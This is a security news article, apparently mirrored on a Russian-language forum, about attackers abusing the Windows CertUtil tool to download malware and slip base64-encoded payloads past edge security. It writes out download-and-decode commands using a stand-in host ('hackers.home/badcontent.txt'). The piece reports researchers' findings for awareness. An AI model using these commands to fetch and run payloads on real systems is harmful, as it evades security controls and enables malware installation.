Похоже, вы здесь новенький. Чтобы принять участие, нажмите одну из кнопок ниже!
Windows has a built-in program called CertUtil, which can be used to manage certificates in Windows. Using this program you can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows.
One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file using the syntax "certutil.exe -urlcache -split -f [хттп] output.file".
Security researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware.
Smith's concerns were warranted as attackers have been utilizing CertUtil to download malware for quite a while. This sample utilized it in 2016 and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to an infected computer.
You may be wondering why attackers would use CertUtil when they already have a foothold on a computer? This is because some computers may be locked down so that unknown applications are unable to download programs. By using a built-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus be allowed to download files.
This utilization of legitimate Windows programs to download and execute malware is not as it the Windows regsvr32.exe executable can be used in a similar manner.
Использование CertUtil + Base64 для обхода программного обеспечения безопасностиUsing CertUtil+Base64 to Bypass Security Software
Today security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil that may make it easier for attacker's downloads to remain undetected by edge security devices. This is to first base64 encode the malicious file so it appears as harmless text and then decode it after it has been downloaded using CertUtil.exe.
As already discussed, you can download a file using CertUtil.exe by using the following command:
certutil.exe -urlcache -split -f [хттп] output.file
This will download the file in its original form and save it to the computer. The problem with this method is that network security devices can detect the file as malicious and block it.
To get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just appears as harmless text. Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file into the executable.
This is illustrated in Mertens' handler diary.
C:\Temp>certutil.exe -urlcache -split -f "хттпс://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
Этот метод потенциально может пройти мимо пограничного устройства, не будучи обнаруженным, а затем преобразован обратно в исполняемый файл на локальном компьютере, где он может быть не таким безопасным.This method potentially gets it past an edge device without being detected and then be converted back into the executable on the local machine where it may not be as secure.
While, I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -decode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this write-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows.